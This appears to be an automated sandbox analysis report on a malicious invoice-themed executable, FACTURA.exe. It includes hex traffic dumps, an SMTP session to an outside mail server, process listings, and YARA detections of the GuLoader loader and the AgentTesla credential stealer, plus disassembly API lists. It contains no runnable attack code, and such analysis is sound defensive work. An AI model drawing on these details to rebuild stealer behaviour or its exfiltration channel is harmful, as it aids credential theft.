                                                                          2021-10-13 14:18:11 UTC216INData Raw: 41 89 03 45 ab 2e 61 a1 9f 9d 9e 60 5c 00 fd cc b9 b8 7a 07 ef 21 a8 9b 77 8e 94 b2 39 d0 bf 5f c9 5f ca 00 86 49 da ee 31 e1 38 07 53 de 11 eb ea ca 4b da 29 04 4b ba c8 06 2a e8 99 09 ed 76 27 ac 61 9f 0c 87 79 3e 16 39 e1 e4 df e4 4f 85 9d ed b5 71 67 7e f9 c9 fb 91 78 40 30 7b dd 54 e7 33 b5 49 7e 7a d5 87 a3 51 75 ea ff 87 c2 6f d2 20 de 6c b0 25 e1 8a 25 aa 7a b6 2b 50 00 57 1e 3a a3 e4 e7 17 03 04 80 65 e9 7b 71 e6 ec 6a ad 36 44 19 23 15 e7 6e 9a 65 4a d9 21 14 6f f9 82 7f 0b 23 58 76 e1 1e 39 3d 86 bc 33 c5 ef 68 58 db a6 af e2 ff 3c 45 f1 59 87 19 86 b9 8c c3 53 b0 5b 6e 29 6b 5f af fd 09 8d da 37 75 4c 08 18 7a 4d 11 88 cb ce 99 6a 22 26 6f af 7c 06 37 15 48 1f 59 f5 49 6c 8e 15 4d 08 0f e2 ba 6f 1e 84 91 a9 fe f9 9c 71 72 30 b7 63 d8 80 4b c1
                                                                          Data Ascii: AE.a`\z!w9__I18SK)K*v'ay>9Oqg~x@0{T3I~zQuo l%%z+PW:e{qj6D#neJ!o#Xv9=3hX<EYS[n)k_7uLzMj"&o|7HYIlMoqr0cK
                                                                          2021-10-13 14:18:11 UTC217INData Raw: 51 69 b4 3f 48 e2 da cf 0b dd 18 ca cc 40 29 30 59 05 ac dc 09 ee 5d 9e e4 be f3 a9 f0 e3 25 cf 4a cc c2 14 d0 24 3f a7 89 42 c7 95 5c e9 a8 f9 48 21 85 2d d0 0e 14 df 22 3f 53 8d c8 5d d6 45 34 34 36 e9 60 3a ab c4 38 a1 bf 3d d6 04 35 84 e5 7f d8 42 16 3e 95 db 38 1c 7b 42 49 92 36 da 15 c4 6c 15 ef 3d 34 8f 30 47 da 72 a9 3d 7c 46 c1 e4 e6 42 da 43 02 51 41 34 96 02 3c 1e 63 7e e9 68 cb 41 94 ae 02 b5 fe 79 7a 89 d9 8b 7b f9 8f ce ec 1b 1e ae 5c bf c3 29 ed 0c fd c6 e8 a8 f7 9b 09 37 2e 41 52 c2 fa 9f 25 f6 da 57 33 1a 61 ad c8 8b a9 74 8a 11 40 5f 49 06 b4 36 64 e8 50 a9 27 fd f3 e8 c4 cc 24 f4 fb d3 cb a2 1b e3 07 a3 77 04 4f 51 7a 78 59 94 ea f1 34 0f 15 23 47 49 f3 a0 7b 95 40 c9 91 f8 9c 4a 62 f0 af ac 60 88 0b fe 94 89 f0 79 0a bc d4 1e cd 87 ed
                                                                          Data Ascii: Qi?H@)0Y]%J$?B\H!-"?S]E446`:8=5B>8{BI6l=40Gr=|FBCQA4<c~hAyz{\)7.AR%W3at@_I6dP'$wOQzxY4#GI{@Jb`y
                                                                          2021-10-13 14:18:11 UTC219INData Raw: 11 6e b8 a6 89 f2 13 81 b7 3c c6 31 57 d8 de ca f8 9b 4c d2 f7 34 e6 25 02 42 cf 60 4e eb da cc d5 2c 22 42 ad 4f 86 35 74 32 2c e9 79 b7 b1 c1 91 03 96 60 b7 bb 30 f7 45 d6 e9 6f 88 8b 66 b3 71 47 76 f0 c6 7f 00 71 5a b9 76 f9 50 ff b9 80 46 7e 7f d6 9f 26 6b 6d e4 e9 8a c2 6d d0 06 d4 7a bd 30 f1 85 3d a9 7e b4 37 52 02 4d 03 32 a1 ec f0 18 80 9b 88 6b c1 71 68 c3 e5 65 aa 4e 44 73 32 f7 66 4a 19 d5 5b 68 a0 04 68 f6 97 6b 95 a7 4d 6a eb 1e 35 a2 1a b1 ad 46 e3 60 45 cd a6 a3 e0 ee be c1 e6 5c a5 0a 19 b9 9c 51 51 aa c5 76 28 6b 52 32 4d 12 91 c6 20 79 ca 81 1a 7c 5e 92 98 4d 4f 80 7f b2 25 62 b4 76 13 2f 16 a1 b1 71 ea 5e 75 99 1a 4c 05 15 e0 b8 60 10 91 90 a9 ea 77 3c 7d 67 2b 37 c4 d9 8e 5b 4b 7d ec 74 ac 67 ea 92 56 fc 7c 6b 05 8a 44 e7 3c 56 83 3a
                                                                          Data Ascii: n<1WL4%B`N,"BO5t2,y`0EofqGvqZvPF~&kmmz0=~7RM2kqheNDs2fJ[hhkMj5F`E\QQv(kR2M y|^MO%bv/q^uL`w<}g+7[K}tgV|kD<V:
                                                                          2021-10-13 14:18:11 UTC220INData Raw: 5c ed fc dd 4b f5 3e 0a ab f8 e4 27 dd ca 20 d0 94 21 2f 1f a3 9b c2 2b 84 dc 01 a6 f7 46 27 82 2f c2 8e f8 d7 32 1f 56 9f 48 b1 c7 c5 dc 3a 24 69 b5 2b 2a fd 36 a9 b8 3f c4 84 d9 96 65 93 ca 45 1a 23 9b d5 30 12 66 4c 47 9c 35 d2 08 ca 64 08 e1 34 14 8b 31 56 5a 9a a7 33 72 4e c6 e2 ef 49 d2 59 0a 59 69 13 84 0a a9 14 e2 e7 e8 42 4b ad 01 bc 83 2c ff 6b fa 65 de 81 72 eb 0e bb ee 1d 19 a5 55 b6 c4 70 fc 8d 44 cf fa 28 1b 9d 09 35 29 5c 57 ca f0 bf 25 e2 c8 d7 aa 1b 73 45 24 87 2e 73 88 1f 42 43 54 1a a9 2a 79 ea 57 a9 25 fd fd f9 45 f5 23 54 f9 d1 d9 22 f7 ed 0e 83 75 06 5d d1 96 6a d9 41 e6 f7 32 12 10 29 45 cb 73 75 66 30 c8 cd b1 7e 94 40 73 73 7e a6 40 8b 0a ec 14 74 62 f9 d3 54 d0 1e cf 8d e7 00 c3 b0 8d 04 ed 97 05 21 03 31 af 69 b8 71 7d 0d 7a 56
                                                                          Data Ascii: \K>' !/+F'/2VH:$i+*6?eE#0fLG5d41VZ3rNIYYiBK,kerUpD(5)\W%sE$.sBCT*yW%E#T"u]jA2)Esuf0~@ss~@tbT!1iq}zV
                                                                          2021-10-13 14:18:11 UTC221INData Raw: fa ca 11 ce 18 27 6b f1 93 8e 9b bd 28 ae 5f 67 24 ef bc 72 4d 01 59 69 8c 0e 45 12 c4 93 2b a3 51 16 22 1e 96 a1 bd 99 35 e1 ee 9e 89 76 65 56 c5 e8 d1 ed 02 3d 4b 0a b4 38 8b 54 83 40 54 47 f8 ec d7 25 15 8c 96 e3 b3 59 da 0a dc 67 b8 2d f4 8d 35 a1 7d be 36 5a 08 5d 02 30 bf ec e0 06 80 85 88 6d e1 73 75 c6 ed 6b a6 3d 44 1b 32 96 66 7f 19 e4 5b 5a a0 12 6f f8 8a 6e 88 a2 51 76 e3 16 28 be 07 ad b0 44 eb 68 59 d0 ba ab e4 ee bf c4 fa 59 85 0b 04 bc 9e 41 56 a2 d9 6b 2d 76 4e 2f 51 0f 8d db 3c 64 cf 89 1e 7a 4c 16 99 48 4f 80 6d 36 24 64 b3 74 0e 2a 04 c8 bb 51 e9 43 70 84 1f 51 00 08 e5 b2 67 16 8c 95 b4 ef 79 34 75 6f 21 37 c7 dc 80 4a cf 78 fe f0 a5 6c ed 94 58 ee fd f6 00 82 59 e2 34 5e 84 39 c7 ec 53 95 fb 92 7d 38 c8 ba e1 66 71 ec d0 14 a3 c8 2b
                                                                          Data Ascii: 'k(_g$rMYiE+Q"5veV=K8T@TG%Yg-5}6Z]0msuk=D2f[ZonQv(DhYYAVk-vN/Q<dzLHOm6$dt*QCpQgy4uo!7JxlXY4^9S}8fq+


                                                                          SMTP Packets

                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                          Oct 13, 2021 16:20:03.013747931 CEST58749795188.93.227.195192.168.11.20220-iberweb-11a.ibername.com ESMTP Exim 4.94.2 #2 Wed, 13 Oct 2021 15:20:01 +0100
                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                          220 and/or bulk e-mail.
                                                                          Oct 13, 2021 16:20:03.014467955 CEST49795587192.168.11.20188.93.227.195EHLO 841675
                                                                          Oct 13, 2021 16:20:03.065952063 CEST58749795188.93.227.195192.168.11.20250-iberweb-11a.ibername.com Hello 841675 [102.129.143.96]
                                                                          250-SIZE 52428800
                                                                          250-8BITMIME
                                                                          250-PIPELINING
                                                                          250-PIPE_CONNECT
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-STARTTLS
                                                                          250 HELP
                                                                          Oct 13, 2021 16:20:03.066353083 CEST49795587192.168.11.20188.93.227.195STARTTLS
                                                                          Oct 13, 2021 16:20:03.120260954 CEST58749795188.93.227.195192.168.11.20220 TLS go ahead

                                                                          Code Manipulations

                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Start time:16:17:18
                                                                          Start date:13/10/2021
                                                                          Path:C:\Users\user\Desktop\FACTURA.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\Desktop\FACTURA.exe'
                                                                          Imagebase:0x400000
                                                                          File size:98304 bytes
                                                                          MD5 hash:D9B54BD175163EAE11715A5B89B32ABA
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Visual Basic
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2937488053.0000000002330000.00000040.00000001.sdmp, Author: Joe Security
                                                                          Reputation:low

                                                                          General

                                                                          Start time:16:17:44
                                                                          Start date:13/10/2021
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\Desktop\FACTURA.exe'
                                                                          Imagebase:0xf60000
                                                                          File size:65440 bytes
                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.7445502415.000000001E461000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.7445502415.000000001E461000.00000004.00000001.sdmp, Author: Joe Security
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:16:17:44
                                                                          Start date:13/10/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff709b30000
                                                                          File size:875008 bytes
                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:16:23:30
                                                                          Start date:13/10/2021
                                                                          Path:C:\Windows\System32\oobe\UserOOBEBroker.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                                                                          Imagebase:0x7ff72b180000
                                                                          File size:57856 bytes
                                                                          MD5 hash:BCE744909EB87F293A85830D02B3D6EB
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low

                                                                          Disassembly

                                                                          Code Analysis

                                                                          Reset < >

                                                                            Executed Functions

                                                                            APIs
                                                                            • __vbaNew2.MSVBVM60(00410F60,00415010), ref: 004139F9
                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413A18
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410D98,000000F8), ref: 00413A3E
                                                                            • __vbaNew2.MSVBVM60(00410F60,00415010), ref: 00413A57
                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413A70
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410D98,000001B4), ref: 00413B20
                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00413B30
                                                                            • #606.MSVBVM60(00000001,?), ref: 00413B4D
                                                                            • __vbaStrMove.MSVBVM60 ref: 00413B58
                                                                            • __vbaStrCmp.MSVBVM60(00410DCC,00000000), ref: 00413B6A
                                                                            • __vbaFreeStr.MSVBVM60 ref: 00413B79
                                                                            • __vbaFreeVar.MSVBVM60 ref: 00413B88
                                                                            • #706.MSVBVM60(00000001,00000000,00000000), ref: 00413B99
                                                                            • __vbaStrMove.MSVBVM60 ref: 00413BA4
                                                                            • __vbaNew2.MSVBVM60(00410D78,00415590), ref: 00413BBD
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,02AB004C,00410D68,00000014), ref: 00413BE2
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410D88,00000070), ref: 00413C09
                                                                            • __vbaFreeObj.MSVBVM60 ref: 00413C12
                                                                            • #580.MSVBVM60(Stalakitter,00000001), ref: 00413C1F
                                                                            • #574.MSVBVM60(00000002), ref: 00413C37
                                                                            • __vbaStrMove.MSVBVM60 ref: 00413C42
                                                                            • __vbaStrCmp.MSVBVM60(00410DF0,00000000), ref: 00413C4E
                                                                            • __vbaFreeStr.MSVBVM60 ref: 00413C5D
                                                                            • __vbaFreeVar.MSVBVM60 ref: 00413C66
                                                                            • #594.MSVBVM60(00000002), ref: 00413C81
                                                                            • __vbaFreeVar.MSVBVM60 ref: 00413C8A
                                                                            • #648.MSVBVM60(00000002), ref: 00413C96
                                                                            • __vbaFreeVar.MSVBVM60 ref: 00413C9F
                                                                            • __vbaVarDup.MSVBVM60 ref: 00413CBB
                                                                            • #666.MSVBVM60(?,00000002), ref: 00413CC9
                                                                            • __vbaVarMove.MSVBVM60 ref: 00413CD5
                                                                            • __vbaFreeVar.MSVBVM60 ref: 00413CDE
                                                                            • __vbaNew2.MSVBVM60(00410F60,00415010), ref: 00413D1A
                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413D33
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410D98,000000F8), ref: 00413D5D
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00401140,004109AC,000006F8), ref: 00413D94
                                                                            • __vbaFreeObj.MSVBVM60 ref: 00413D9D
                                                                            • __vbaNew2.MSVBVM60(00410F60,00415010), ref: 00413DB6
                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413DCF
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410D98,00000130), ref: 00413DF6
                                                                            • __vbaLateIdCallLd.MSVBVM60(00000002,?,00000000,00000000), ref: 00413E08
                                                                            • __vbaStrVarMove.MSVBVM60(00000000), ref: 00413E12
                                                                            • __vbaStrMove.MSVBVM60 ref: 00413E1D
                                                                            • __vbaFreeStr.MSVBVM60 ref: 00413E44
                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00413E54
                                                                            • __vbaFreeVar.MSVBVM60 ref: 00413E60
                                                                            • __vbaNew2.MSVBVM60(00410F60,00415010), ref: 00413E75
                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413E8E
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410D98,00000078), ref: 00413EB8
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00401140,004109AC,000006FC), ref: 00413F09
                                                                            • __vbaFreeObj.MSVBVM60 ref: 00413F0E
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00401140,0041097C,000002B4), ref: 00413F2F
                                                                            • __vbaVarAdd.MSVBVM60(00000002,?,?), ref: 00413F5D
                                                                            • __vbaVarMove.MSVBVM60 ref: 00413F64
                                                                            • #598.MSVBVM60 ref: 00413F6A
                                                                            • __vbaVarTstLt.MSVBVM60(00000002,?), ref: 00413F88
                                                                            • __vbaFreeVar.MSVBVM60(00413FF2), ref: 00413FE1
                                                                            • __vbaFreeStr.MSVBVM60 ref: 00413FE6
                                                                            • __vbaFreeVar.MSVBVM60 ref: 00413FEF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2935755867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2935705512.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935917274.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935965732.0000000000416000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: __vba$Free$CheckHresult$Move$New2$List$#574#580#594#598#606#648#666#706CallLate
                                                                            • String ID: $Mallorcinerens$Stalakitter$zk:K&6
                                                                            • API String ID: 1003127262-3539258339
                                                                            • Opcode ID: bb90664c0487d9a779c6487a961d76e188d3d30cd431f59afa7af14c20f57c6f
                                                                            • Instruction ID: 937789cae48c46156ab7b725fc86c85e1c32e107243e17b1d695e945e4b9526d
                                                                            • Opcode Fuzzy Hash: bb90664c0487d9a779c6487a961d76e188d3d30cd431f59afa7af14c20f57c6f
                                                                            • Instruction Fuzzy Hash: FE125B70A00219DFDB10DFA4DD88BDEBBB8FF48705F10816AE549A7260DB746A85CF58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2935755867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2935705512.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935917274.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935965732.0000000000416000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: #100
                                                                            • String ID: VB5!6"*
                                                                            • API String ID: 1341478452-2992194029
                                                                            • Opcode ID: 3840d449ec1ddc23fdaf9bae2caad7b453dc487ed87417911bed8979949778d5
                                                                            • Instruction ID: 79355dc4bffd6cf1265348a2a2bfcb79cc83b055984265e36e24f2c9158d0841
                                                                            • Opcode Fuzzy Hash: 3840d449ec1ddc23fdaf9bae2caad7b453dc487ed87417911bed8979949778d5
                                                                            • Instruction Fuzzy Hash: E331C6A644E7C04FD34397749C296A17FB4AE13229B1A06DBC4D1CB4F3E668680AD726
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2937488053.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ?Ez;
                                                                            • API String ID: 0-2609250456
                                                                            • Opcode ID: f53f30e3f33c47946d3e0cea56e7fac5ea5206461c472fe5cce9c5221ac5f9a4
                                                                            • Instruction ID: a22f2ff0619e00a049cd5663fb17ff94f48b2b6cfa1a6a16c1e9febbd1aca2d3
                                                                            • Opcode Fuzzy Hash: f53f30e3f33c47946d3e0cea56e7fac5ea5206461c472fe5cce9c5221ac5f9a4
                                                                            • Instruction Fuzzy Hash: DE414772241E459FD703DF24D4936EABB68FE422607D80AEDC4524B892D322E647CF86
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2937488053.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 68b2ac9b139fa7e48b8596ed7a37e0737a4f9b47682c61c04d09852708648e9f
                                                                            • Instruction ID: 0c95382e4cfceddee097be69b2685aabd52da0be70e3a07df3d342551762118d
                                                                            • Opcode Fuzzy Hash: 68b2ac9b139fa7e48b8596ed7a37e0737a4f9b47682c61c04d09852708648e9f
                                                                            • Instruction Fuzzy Hash: 72818C32604F84AFDB13CF64D8A16EBBB65EE027607D406DDD88657483D322AA46CF81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2937488053.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: baea07aae344fb92941d30cca99cf0cf36cc5700fa9bbb1cae880d4db5e303b3
                                                                            • Instruction ID: 32e14b9387e50e9fd8f04610bcf525c5dbe46695f0d32834e45d1951741b5b99
                                                                            • Opcode Fuzzy Hash: baea07aae344fb92941d30cca99cf0cf36cc5700fa9bbb1cae880d4db5e303b3
                                                                            • Instruction Fuzzy Hash: 56512667205E8957CB138AA4D9523FB7F5CD9062247C80BE9C5965B8E3D311A246CFC1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2937488053.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8b062cddfb7d0d558e8866fa930a47bef6b75af4f3d66458b1c7767b6fd9da5b
                                                                            • Instruction ID: f5dfa71d5066ebb5ac143d1e0fab9420b77e4e5ab8f8c98b5954dc4eefbc064c
                                                                            • Opcode Fuzzy Hash: 8b062cddfb7d0d558e8866fa930a47bef6b75af4f3d66458b1c7767b6fd9da5b
                                                                            • Instruction Fuzzy Hash: B5514AB5204F896FCB13CB64D8A17EA7F69DE022247880AEDC58247593C352E187CF85
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2935755867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2935705512.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935917274.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935965732.0000000000416000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                                                                            • Instruction ID: d394a65342a6a254380257ba0734a19f866dc21ad068f5b1ddaac111a7468d93
                                                                            • Opcode Fuzzy Hash: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                                                                            • Instruction Fuzzy Hash: F641279025E2D4EFC71B47B64CBA2813FE1AE07108B1A88EFD6D54B8A3E555241FC727
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2935755867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2935705512.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935917274.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935965732.0000000000416000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 870d35c48bee2099da5c69f9cc0cf0982c60936687ed066cfcabcd21101ec3fc
                                                                            • Instruction ID: e33f2aefceeb9f582bc5411938994d836cdb629a568c729493db18bc5475b075
                                                                            • Opcode Fuzzy Hash: 870d35c48bee2099da5c69f9cc0cf0982c60936687ed066cfcabcd21101ec3fc
                                                                            • Instruction Fuzzy Hash: E43107B25095AA9FD7229E38C851397BFA0EB47714354419EC8928F5A3C765A503CBC2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2937488053.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4bdb584472487f952f6b436804cc10f39fa281719e4b5600d8957409646a4cba
                                                                            • Instruction ID: dd2376a97ba4424125904a979da91df62dd26e76c369eea3189b1ea71e5862b0
                                                                            • Opcode Fuzzy Hash: 4bdb584472487f952f6b436804cc10f39fa281719e4b5600d8957409646a4cba
                                                                            • Instruction Fuzzy Hash: 1A41ACB2404A895FDB27CF24C8852DABF64DE02160B944ADDCC924B6CBC312A857CBC6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2935755867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2935705512.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935917274.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935965732.0000000000416000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                                                                            • Instruction ID: 0ef76ab4ed2bcdf07a831812e9108315abc5032b0251afc9fc56c28be75d868b
                                                                            • Opcode Fuzzy Hash: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                                                                            • Instruction Fuzzy Hash: 5E11DAB150E3E59FCB174B748CB52527FB0AF1B20070A44EBD4819F8A7E268281ED727
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2935755867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2935705512.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935917274.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935965732.0000000000416000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                                                                            • Instruction ID: 3a4f40afd7daac755765d0dbc513794409bb1d663c47dbf88c845af7c1cdfe86
                                                                            • Opcode Fuzzy Hash: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                                                                            • Instruction Fuzzy Hash: CBF07A70124154EFCB06CF74D8A5A063BE1AF5B3407451CDAD9108F475D736B865EB12
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • #685.MSVBVM60 ref: 00413542
                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413553
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410DA8,0000001C), ref: 00413570
                                                                            • __vbaFreeObj.MSVBVM60 ref: 00413588
                                                                            • __vbaNew2.MSVBVM60(00410D78,00415590), ref: 004135A9
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,02AB004C,00410D68,00000014), ref: 004135CE
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410D88,000000D0), ref: 004135F8
                                                                            • __vbaStrMove.MSVBVM60 ref: 0041360D
                                                                            • __vbaFreeObj.MSVBVM60 ref: 00413612
                                                                            • #539.MSVBVM60(?,00000001,00000001,00000001), ref: 00413622
                                                                            • __vbaStrVarMove.MSVBVM60(?), ref: 0041362C
                                                                            • __vbaStrMove.MSVBVM60 ref: 00413637
                                                                            • __vbaFreeVar.MSVBVM60 ref: 0041363C
                                                                            • #568.MSVBVM60(00000063), ref: 00413644
                                                                            • __vbaNew2.MSVBVM60(00410F60,00415010), ref: 0041365D
                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413676
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410DB8,00000178), ref: 004136F7
                                                                            • __vbaFreeObj.MSVBVM60 ref: 00413700
                                                                            • __vbaNew2.MSVBVM60(00410F60,00415010), ref: 00413719
                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413738
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410D98,000000F8), ref: 0041375B
                                                                            • __vbaNew2.MSVBVM60(00410F60,00415010), ref: 00413774
                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041378D
                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410D98,000001B4), ref: 00413828
                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00413838
                                                                            • __vbaFreeStr.MSVBVM60(00413880), ref: 00413878
                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041387D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2935755867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2935705512.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935917274.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.2935965732.0000000000416000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: __vba$Free$CheckHresult$New2$Move$#539#568#685List
                                                                            • String ID:
                                                                            • API String ID: 342513763-0
                                                                            • Opcode ID: 005292e21a0ce41c29a5bb3cb97197b24b793ff3069bbfee0da40d7d0bf9945b
